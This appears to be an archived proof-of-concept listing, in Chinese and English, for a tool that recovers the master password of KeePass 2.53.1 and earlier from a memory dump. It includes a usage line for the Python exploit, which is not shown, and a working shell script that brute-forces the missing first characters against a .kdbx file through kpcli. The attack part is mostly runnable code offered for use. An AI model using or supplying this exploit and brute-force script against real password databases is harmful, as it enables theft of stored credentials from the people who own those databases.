关联漏洞
描述
Retrieve the master password of a keepass database <= 2.53.1
介绍
# keepass-dump-masterkey
## Usage
`python3 poc.py <PathToDmp>`
## Preview
As a reminder, the first character cannot be found in the dump, and for the second the script will only give you a few possibilities, in any case we recommend you to run the bruteforce on 2 chars with the script below
```bash
#!/bin/sh
# Usage: ./keepass-pwn.sh Database.kdbx wordlist.txt (wordlist with 2 char)
while read i
do
echo "Using password: \"$i\""
echo "$i" | kpcli --kdb=$1 && exit 0
done < $2
```
>This script works very well in the case of a physical machine, for virtual machines it does not seem stable
Btw : the python script present in this project follows the reading of the following project: https://github.com/vdohney/keepass-password-dumper
文件快照
[4.0K] /data/pocs/c8f140790d0e25b4fffc98fd8269c455135f0704
├── [4.0K] img
│ └── [ 30K] preview.png
├── [2.7K] poc.py
└── [ 778] README.md
1 directory, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。